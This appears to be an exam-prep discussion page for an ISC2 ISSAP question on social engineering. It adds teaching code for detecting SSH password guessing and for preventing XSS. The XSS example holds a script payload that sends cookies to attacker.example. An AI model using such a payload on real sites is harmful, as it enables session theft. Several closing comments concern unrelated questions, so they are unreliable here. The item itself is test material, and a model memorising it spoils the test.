Welcome to Pass4Success


ISC2 ISSAP Exam - Topic 4 Question 3 Discussion

Actual exam question for ISC2's ISSAP exam
Question #: 3
Topic #: 4

Which of the following types of attack can be used to break the best physical and logical security mechanism to gain access to a system?

Suggested Answer: A

Social engineering is the art of convincing people to disclose useful information such as account names and passwords. Attackers then use that information to gain access to a user's computer or network. The method relies on manipulating people rather than on technical skill, which is why it can defeat even the best physical and logical controls: the controls themselves are never attacked; a person is simply persuaded to hold the door open or hand over a credential. A user should always distrust anyone who asks for an account name or password, computer name, IP address, employee ID, or other information that can be misused.

Answer option D is incorrect. A password guessing attack occurs when an unauthorized user repeatedly tries to log on to a computer or network by guessing usernames and passwords. Many password guessing programs are freely available on the Internet. The two main types of password guessing attack are:

Brute force attack (every possible combination is tried in turn)

Dictionary attack (candidates are taken from a list of likely words and passwords)
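Password guessing is noisy: the repeated failed logons the explanation describes are exactly what a defender looks for. The following is an added example (it is not part of the original question or explanation) that parses constructed OpenSSH-style "Failed password" lines and flags any source address that produces five or more failures inside a one-minute sliding window; the log lines, the host name and the addresses are all made up for the example. A dictionary or username-spraying run shows up as many distinct usernames from one address, a brute-force run against one account as a single username.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log lines in OpenSSH "Failed password" format (not real data).
SAMPLE_LOG = """\
Jan 10 09:00:01 host sshd[1201]: Failed password for invalid user admin from 203.0.113.7 port 40122 ssh2
Jan 10 09:00:02 host sshd[1202]: Failed password for root from 203.0.113.7 port 40123 ssh2
Jan 10 09:00:02 host sshd[1203]: Failed password for invalid user test from 203.0.113.7 port 40124 ssh2
Jan 10 09:00:03 host sshd[1204]: Failed password for invalid user guest from 203.0.113.7 port 40125 ssh2
Jan 10 09:00:04 host sshd[1205]: Failed password for root from 203.0.113.7 port 40126 ssh2
Jan 10 09:00:05 host sshd[1206]: Failed password for invalid user oracle from 203.0.113.7 port 40127 ssh2
Jan 10 09:00:09 host sshd[1207]: Accepted password for alice from 198.51.100.20 port 51000 ssh2
Jan 10 09:03:30 host sshd[1208]: Failed password for alice from 198.51.100.20 port 51001 ssh2
Jan 10 09:45:00 host sshd[1209]: Failed password for bob from 198.51.100.21 port 51002 ssh2
"""

# Matches only failed-password lines; "invalid user" appears when the name does not exist.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_failures(text, year=2025):
    """Yield (timestamp, username, source_ip) for every failed-login line.

    Syslog lines carry no year, so one is assumed (year parameter)."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # accepted logins and unrelated lines are ignored
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["user"], m["ip"]


def detect_guessing(text, threshold=5, window=timedelta(minutes=1)):
    """Flag source IPs with >= threshold failures inside any sliding window.

    Returns {ip: (failures_in_window, usernames_tried_by_that_ip)} for each
    offending address; the username tuple covers the whole log, not just the
    window, so the analyst can see whether one account or many were targeted."""
    recent = defaultdict(deque)  # ip -> timestamps currently inside the window
    users = defaultdict(set)     # ip -> every username that address tried
    hits = {}
    for ts, user, ip in sorted(parse_failures(text)):
        q = recent[ip]
        q.append(ts)
        users[ip].add(user)
        while q and ts - q[0] > window:  # drop failures older than the window
            q.popleft()
        if len(q) >= threshold:
            hits[ip] = (len(q), tuple(sorted(users[ip])))
    return hits


if __name__ == "__main__":
    for ip, (count, names) in detect_guessing(SAMPLE_LOG).items():
        print(f"{ip}: {count} failures in one minute, usernames tried: {', '.join(names)}")
```

With the sample above only 203.0.113.7 is flagged (six failures in five seconds across five usernames); alice's single typo and bob's lone failure stay below the threshold. In production the same counting is what fail2ban-style lockout or an account-lockout policy does, and the threshold and window should be tuned so that one mistyped password does not lock out a legitimate user.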

Answer option B is incorrect. A cross-site scripting (XSS) attack is one in which an attacker injects malicious content into a Web site. For example, the attacker posts a message containing a script to a forum or newsgroup site; when another user views that message, the browser interprets the script as part of the page and executes it, so the attacker's code runs with that user's access to the site. Cross-site scripting attacks rely on client-side code such as JavaScript (historically also VBScript, ActiveX, Flash or Java applets) executing within the user's Web environment. With the help of a cross-site scripting attack, the attacker can steal cookies, hijack sessions, and so on. It is a logical attack on a Web application, not a way past physical controls.
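The cookie-stealing case in the explanation comes down to one rendering mistake: untrusted text is pasted into HTML without escaping. The following is an added example (not part of the original explanation) showing, in a server-side Python rendering function, the vulnerable concatenation beside the escaped form, plus the cookie flags that limit the damage even when escaping is missed. The attacker host attacker.example and the payload are constructed for the example.

```python
import html

# Constructed attacker payload: if rendered unescaped, it loads an image whose
# URL carries the victim's cookies to a host the attacker controls.
COOKIE_STEALER = (
    "<script>new Image().src='https://attacker.example/c?'+"
    "document.cookie</script>"
)


def render_message_vulnerable(author, body):
    """Vulnerable: user-controlled strings are concatenated straight into HTML."""
    return f"<div class='post'><b>{author}</b>: {body}</div>"


def render_message_safe(author, body):
    """Hardened: every untrusted value is HTML-escaped before insertion.

    quote=True also escapes ' and ", so the value cannot break out of an
    attribute either."""
    return (
        f"<div class='post'><b>{html.escape(author, quote=True)}</b>: "
        f"{html.escape(body, quote=True)}</div>"
    )


def contains_script(markup):
    """Demonstration check only: does the output contain a live <script> tag?"""
    return "<script" in markup.lower()


def session_cookie_header(session_id, secure=True):
    """Set-Cookie header with the flags that blunt cookie theft through XSS.

    HttpOnly keeps document.cookie from reading the value, Secure keeps it off
    plaintext HTTP, and SameSite=Lax stops most cross-site requests from
    carrying it. None of these replaces output escaping."""
    flags = ["HttpOnly", "SameSite=Lax"]
    if secure:
        flags.append("Secure")
    return f"Set-Cookie: session={session_id}; Path=/; " + "; ".join(flags)


if __name__ == "__main__":
    print("vulnerable:", render_message_vulnerable("mallory", COOKIE_STEALER))
    print("safe:      ", render_message_safe("mallory", COOKIE_STEALER))
    print(session_cookie_header("c0ffee"))
```

The vulnerable output contains the attacker's script verbatim; the safe output renders it as visible text (`&lt;script&gt;...`) that the browser never executes. Real applications should use a templating engine with auto-escaping on rather than hand-built f-strings, but the principle is the same.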

Answer option C is incorrect. Mail bombing is an attack that overwhelms mail servers and clients by sending a large volume of unwanted e-mail. The aim is to flood the recipient's mailbox or disk with useless messages, causing at best irritation and at worst a complete denial of mail service. E-mail filtering and properly configuring relay functionality on mail servers (in particular, not running an open relay) help protect against this type of attack. It is a denial-of-service technique, not a way to gain access to a system.


Contribute your Thoughts:

Howard
4 months ago
Cross-site scripting can be serious too, but not for physical access.
upvoted 0 times
Roselle
4 months ago
Totally agree with A, it's all about manipulating people.
upvoted 0 times
Nada
4 months ago
Wait, can mail bombing really break security? Sounds off.
upvoted 0 times
Rosio
4 months ago
I think D is also a big threat, password guessing is common.
upvoted 0 times
Miesha
5 months ago
Definitely A, social engineering is super effective.
upvoted 0 times
Eun
5 months ago
I feel like mail bombing is more about overwhelming a system rather than breaking security, so I’m leaning towards social engineering for this one.
upvoted 0 times
Levi
5 months ago
Social engineering seems like the right answer since it can manipulate people into giving access, but I wonder if cross-site scripting could also be a contender in some scenarios.
upvoted 0 times
Ahmad
5 months ago
I remember practicing a question similar to this, and I think password guessing attacks are more about brute force rather than bypassing security mechanisms.
upvoted 0 times
Ammie
5 months ago
I think social engineering attacks are really effective because they exploit human psychology, but I'm not entirely sure if they can break both physical and logical security.
upvoted 0 times
Jeffrey
5 months ago
This one seems pretty straightforward. I'm pretty confident the answer is true - an SSH private key should never be shared with other users or systems.
upvoted 0 times
Paz
5 months ago
Hmm, I'm not sure about this one. HIPAA, ISO27001, and PCI DSS all seem like they could be relevant for healthcare data. I'll need to think this through carefully.
upvoted 0 times
Mohammad
5 months ago
Okay, I think I've got it. The key is to remember that a Node Manager is configured at the machine level, not the domain level.
upvoted 0 times
Brock
5 months ago
Okay, I think I've got this. The key is to identify the number of factors (pens, paper, school diary, bag) and then use the pairwise testing formula to calculate the minimum number of test cases. Let me work through this step-by-step.
upvoted 0 times
Rosendo
5 months ago
Hmm, this seems like a tricky one. I'll need to think through the different Outlook settings carefully to figure out the best approach.
upvoted 0 times